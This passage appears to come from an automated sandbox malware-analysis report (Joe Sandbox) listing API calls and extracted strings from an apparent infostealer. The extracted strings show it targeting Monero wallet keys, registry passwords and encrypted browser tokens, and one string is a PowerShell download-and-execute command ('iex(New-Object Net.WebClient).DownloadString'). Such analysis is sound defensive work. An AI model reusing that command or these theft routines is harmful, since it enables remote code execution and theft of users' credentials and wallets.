                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155318
                              • lstrlen.KERNEL32(00000000), ref: 0015532F
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00155364
                              • lstrlen.KERNEL32(00000000), ref: 00155383
                              • lstrlen.KERNEL32(00000000), ref: 001553AE
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 1c5feed6aa0606758e54b214675115a0e6b5224d4ea4806cbc787ff929327af0
                              • Instruction ID: de4830fc4e83f047a8536932b4c9c3996703d8f1c65d58810fdb0b6c2bf86249
                              • Opcode Fuzzy Hash: 1c5feed6aa0606758e54b214675115a0e6b5224d4ea4806cbc787ff929327af0
                              • Instruction Fuzzy Hash: B851CC70950148EBDB18EF60CD96AED7779BF24302F904118FC165E5A2EF346B49CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: c9d73e6e623a3623f7ab5471825696b20402979a482f6697f8b5f355f8d3ec9a
                              • Instruction ID: 2bf4cc6488d69dc1932553446ea839ac9b4c85034c776f6bf0306dd4e27a442e
                              • Opcode Fuzzy Hash: c9d73e6e623a3623f7ab5471825696b20402979a482f6697f8b5f355f8d3ec9a
                              • Instruction Fuzzy Hash: 09C195B5940209DBCB14EF60DC89FEA7778BF64305F0045D9F91AAB141EB70AA89CF91
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001542EC
                              • lstrcat.KERNEL32(?,00DDE488), ref: 0015430B
                              • lstrcat.KERNEL32(?,?), ref: 0015431F
                              • lstrcat.KERNEL32(?,00DDD5C8), ref: 00154333
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158D90: GetFileAttributesA.KERNEL32(00000000,?,00141B54,?,?,0016564C,?,?,00160E1F), ref: 00158D9F
                                • Part of subcall function 00149CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00149D39
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 001593C0: GlobalAlloc.KERNEL32(00000000,001543DD,001543DD), ref: 001593D3
                              • StrStrA.SHLWAPI(?,00DDE350), ref: 001543F3
                              • GlobalFree.KERNEL32(?), ref: 00154512
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149AEF
                                • Part of subcall function 00149AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00144EEE,00000000,?), ref: 00149B01
                                • Part of subcall function 00149AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00144EEE,00000000,00000000), ref: 00149B2A
                                • Part of subcall function 00149AC0: LocalFree.KERNEL32(?,?,?,?,00144EEE,00000000,?), ref: 00149B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001544A3
                              • StrCmpCA.SHLWAPI(?,001608D1), ref: 001544C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001544D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001544E5
                              • lstrcat.KERNEL32(00000000,00160FB8), ref: 001544F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 26016f3c79f69b4b41a127eb4c3587bbac8d74f190ac60f90f902cb0b8e84496
                              • Instruction ID: dd01a37b42610de0c3cffaad58426d95e26d241a170af6792f9dc54a313beb06
                              • Opcode Fuzzy Hash: 26016f3c79f69b4b41a127eb4c3587bbac8d74f190ac60f90f902cb0b8e84496
                              • Instruction Fuzzy Hash: 117175B6900218ABDB14EBA0DC85FEE777DAF98305F004598F615A7181EB34DB49CBA1
                              APIs
                                • Part of subcall function 001412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001412B4
                                • Part of subcall function 001412A0: RtlAllocateHeap.NTDLL(00000000), ref: 001412BB
                                • Part of subcall function 001412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001412D7
                                • Part of subcall function 001412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001412F5
                                • Part of subcall function 001412A0: RegCloseKey.ADVAPI32(?), ref: 001412FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0014134F
                              • lstrlen.KERNEL32(?), ref: 0014135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00141377
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00141465
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 001414EF
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 8c7ef575fe52235f9b6274778e77e7011cf078cefbf2ad5a0d88e2bc7fb3e42b
                              • Instruction ID: 5dc6d9c06bfe7e2c1ef87927c06ffb16b2ab8acfdb9c054f0d718973dc41999d
                              • Opcode Fuzzy Hash: 8c7ef575fe52235f9b6274778e77e7011cf078cefbf2ad5a0d88e2bc7fb3e42b
                              • Instruction Fuzzy Hash: 1E5145B1D9011897CB15FB60DD92FED733CAF64301F8042D8B61A66091EF746B89CBA6
                              APIs
                                • Part of subcall function 001472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0014733A
                                • Part of subcall function 001472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001473B1
                                • Part of subcall function 001472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0014740D
                                • Part of subcall function 001472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00147452
                                • Part of subcall function 001472D0: HeapFree.KERNEL32(00000000), ref: 00147459
                              • lstrcat.KERNEL32(00000000,001617FC), ref: 00147606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00147648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0014765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0014768F
                              • lstrcat.KERNEL32(00000000,00161804), ref: 001476A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001476D3
                              • lstrcat.KERNEL32(00000000,00161808), ref: 001476ED
                              • task.LIBCPMTD ref: 001476FB
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: d0ccdc23816f45296554534dc1e513075c50c1646a55bb65109639d1f8943ae8
                              • Instruction ID: 83453153b72b10879cdcc95a14e5cccec35eeedc1c43ddccf3bdb993c7c5a047
                              • Opcode Fuzzy Hash: d0ccdc23816f45296554534dc1e513075c50c1646a55bb65109639d1f8943ae8
                              • Instruction Fuzzy Hash: 1C31AC71900609EFDB09EBB4DC95DFE7779BB54302F14415AF102A72A1EB34A906CB62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DDE2A8,00000000,?,00160E2C,00000000,?,00000000), ref: 00158130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00158137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00158158
                              • __aulldiv.LIBCMT ref: 00158172
                              • __aulldiv.LIBCMT ref: 00158180
                              • wsprintfA.USER32 ref: 001581AC
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: e3b062b2fca364a9fb0d08faf814d91dc42e38c7659675ad028eadaf7a7cc98e
                              • Instruction ID: 4c8cddf6da9ff967e8d149f1d90a032d76a577cfc035bac566cda7543784ff3b
                              • Opcode Fuzzy Hash: e3b062b2fca364a9fb0d08faf814d91dc42e38c7659675ad028eadaf7a7cc98e
                              • Instruction Fuzzy Hash: 892129B1A44608ABEB10DFD4DC49FAEB7B8EB44B01F104109F615BB280D77859058BA5
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                              • InternetOpenA.WININET(00160DF7,00000001,00000000,00000000,00000000), ref: 0014610F
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0014618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001461B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 001461DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0014620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00146249
                              • InternetCloseHandle.WININET(?), ref: 00146253
                              • InternetCloseHandle.WININET(00000000), ref: 00146260
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 56ce5e5f4777ab8b0375187dfac04d80ca5f7dc71a907b98243fc305f337be23
                              • Instruction ID: c68a5a22678f4fd1fa5f43526eb1e5a7d741584d435117c8637379d8c7e47f3a
                              • Opcode Fuzzy Hash: 56ce5e5f4777ab8b0375187dfac04d80ca5f7dc71a907b98243fc305f337be23
                              • Instruction Fuzzy Hash: 3B5170B1940708ABEB20DFA0DC45BEE77B8FF44705F108199B605A71D0DBB46A89CF96
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0014733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001473B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0014740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00147452
                              • HeapFree.KERNEL32(00000000), ref: 00147459
                              • task.LIBCPMTD ref: 00147555
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 035aae9d00eadbd1a36f63f80a79d5b59d6cb939fb70fdf8b715b5359126b4f1
                              • Instruction ID: 5ca2bda5b615f77f14f84fbc0f50638e1c621edf546af79f81e9b4cd55fac502
                              • Opcode Fuzzy Hash: 035aae9d00eadbd1a36f63f80a79d5b59d6cb939fb70fdf8b715b5359126b4f1
                              • Instruction Fuzzy Hash: 96613CB59142689BDB24DB50CC41FEAB7BCBF58300F0481E9E649A6191DBB05FC9CFA1
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0014BC9F
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0014BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0014BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0014BDB9
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 3c7c4a6771cf84775b494c460d86d69053323a25ad32cf9b958a0108d3764587
                              • Instruction ID: 8976764d995c1763aba6d0dd797af14951970b34024c92868e36b2e7f2898301
                              • Opcode Fuzzy Hash: 3c7c4a6771cf84775b494c460d86d69053323a25ad32cf9b958a0108d3764587
                              • Instruction Fuzzy Hash: 2AB13371950118DBDB04EBA0CC96DEE733CBF64302F844259F916AA191EF346A4DCB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 408a58d1beff1afb779a740beda3d06ef9159dd0df7226932aa3bbdee6554edf
                              • Instruction ID: 207cac6ac78645cc1d0aa9bdcc851c3323b8a47db8a1029708b6c4a479c8f27a
                              • Opcode Fuzzy Hash: 408a58d1beff1afb779a740beda3d06ef9159dd0df7226932aa3bbdee6554edf
                              • Instruction Fuzzy Hash: A5F05E31904309EFE3459FE0E90972CBB78FB08703F1401DAF6198B290D6784B41ABD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00144FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00144FD1
                              • InternetOpenA.WININET(00160DDF,00000000,00000000,00000000,00000000), ref: 00144FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00145011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00145041
                              • InternetCloseHandle.WININET(?), ref: 001450B9
                              • InternetCloseHandle.WININET(?), ref: 001450C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 46c0f8795d39ec9d5003eafe7675b1006c5675303c38c0215b1ff34f5460cd18
                              • Instruction ID: d111ffa4c46f61e0b177e548e70375b93820c359e8671dc95faa6326ef3514ed
                              • Opcode Fuzzy Hash: 46c0f8795d39ec9d5003eafe7675b1006c5675303c38c0215b1ff34f5460cd18
                              • Instruction Fuzzy Hash: 1B3107B4A40218ABDB20CF94CC85BDDB7B8EB48704F5081D9FB09A7281C7746EC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00158426
                              • wsprintfA.USER32 ref: 00158459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0015847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158499
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE110,00000000,000F003F,?,00000400), ref: 001584EC
                              • lstrlen.KERNEL32(?), ref: 00158501
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE128,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00160B34), ref: 00158599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 7364e97c8bc0ac8c8a76f99c871c39912e0f0487948b5caf2361d72306c44b29
                              • Instruction ID: ca3cf2c35d96149b67cabfd46ed4175ce24c62c4b98c4356a726ae943cbc8c78
                              • Opcode Fuzzy Hash: 7364e97c8bc0ac8c8a76f99c871c39912e0f0487948b5caf2361d72306c44b29
                              • Instruction Fuzzy Hash: 792119B1940218EBEB24DB54DC85FE9B7B8FB48701F00C5D9E609A6140DF71AA86CFE4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001576A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001576AB
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB380,00000000,00020119,00000000), ref: 001576DD
                              • RegQueryValueExA.ADVAPI32(00000000,00DDE230,00000000,00000000,?,000000FF), ref: 001576FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00157708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 03a35ef3b749435ae29e10181b10a327fbeb53b72b5dfd5ff6c6b0389d3a5d49
                              • Instruction ID: 6a877f63466faed1609752363ae69816f4c0be3df1d55915a96104601b8dce50
                              • Opcode Fuzzy Hash: 03a35ef3b749435ae29e10181b10a327fbeb53b72b5dfd5ff6c6b0389d3a5d49
                              • Instruction Fuzzy Hash: EE014FB5A04704FBFB01DBE4ED4AF6ABBBCEB48701F104495FE04AB290D7B499048B61
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0015773B
                              • RegOpenKeyExA.ADVAPI32(80000002,00DCB380,00000000,00020119,001576B9), ref: 0015775B
                              • RegQueryValueExA.ADVAPI32(001576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0015777A
                              • RegCloseKey.ADVAPI32(001576B9), ref: 00157784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 08cd363c496e3a5aa9267bdb8bf33ab73bbb256c5c2c80da856899adf9fce66c
                              • Instruction ID: 72eec97b5c87827521261db8b2d592851104fef30c6f2f4063fb131a61b5ff55
                              • Opcode Fuzzy Hash: 08cd363c496e3a5aa9267bdb8bf33ab73bbb256c5c2c80da856899adf9fce66c
                              • Instruction Fuzzy Hash: B90167B5A40308FBE701DBE4DC4AFAEBBBCEB48701F004595FA05A7281D77455008B61
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                              • LocalFree.KERNEL32(0014148F), ref: 00149A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 14b90cc84fdaeb023cb3b4f77ea435ccf7e5437a0c2a479d0e6e1a47e14f7f63
                              • Instruction ID: 078b3c733953d914c8dc676758b95f26ff773be431e2d857d90d8c27ff94938d
                              • Opcode Fuzzy Hash: 14b90cc84fdaeb023cb3b4f77ea435ccf7e5437a0c2a479d0e6e1a47e14f7f63
                              • Instruction Fuzzy Hash: 24312174A00309EFDB14CF94C945BAE77B9FF48341F204199E911A72A0D778A941CFA1
                              APIs
                              • lstrcat.KERNEL32(?,00DDE488), ref: 001547DB
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154801
                              • lstrcat.KERNEL32(?,?), ref: 00154820
                              • lstrcat.KERNEL32(?,?), ref: 00154834
                              • lstrcat.KERNEL32(?,00DCAB58), ref: 00154847
                              • lstrcat.KERNEL32(?,?), ref: 0015485B
                              • lstrcat.KERNEL32(?,00DDDA28), ref: 0015486F
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158D90: GetFileAttributesA.KERNEL32(00000000,?,00141B54,?,?,0016564C,?,?,00160E1F), ref: 00158D9F
                                • Part of subcall function 00154570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00154580
                                • Part of subcall function 00154570: RtlAllocateHeap.NTDLL(00000000), ref: 00154587
                                • Part of subcall function 00154570: wsprintfA.USER32 ref: 001545A6
                                • Part of subcall function 00154570: FindFirstFileA.KERNEL32(?,?), ref: 001545BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: b8bf6ebb79f368371be1d6c756213e6d1083bef7cd4c9af76a10e424568fe416
                              • Instruction ID: 415abe3b8f69e826ad1ac4f6ad039e1f69e357c7ae33e2e3da0bf25877ef9b98
                              • Opcode Fuzzy Hash: b8bf6ebb79f368371be1d6c756213e6d1083bef7cd4c9af76a10e424568fe416
                              • Instruction Fuzzy Hash: EC3184B2900318A7DB11FBB0DC85EED737CAB58705F404589B725AA081EF74978DCBA1
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00152D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00152CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00152D04
                              • ')", xrefs: 00152CB3
                              • <, xrefs: 00152D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 84b5b374444bb2e543abde0323e03bf92e1b7f8d7158f7a4c1405d2bbf402720
                              • Instruction ID: a61e0a714b37e7ca661f38156437a27bc583827d8e88ff016e4f990dd62832a6
                              • Opcode Fuzzy Hash: 84b5b374444bb2e543abde0323e03bf92e1b7f8d7158f7a4c1405d2bbf402720
                              • Instruction Fuzzy Hash: AC41D271C90208DADB15EBA0CC92BDDB774BF24302F904119E926AF191EF756A4ECF91
                              APIs
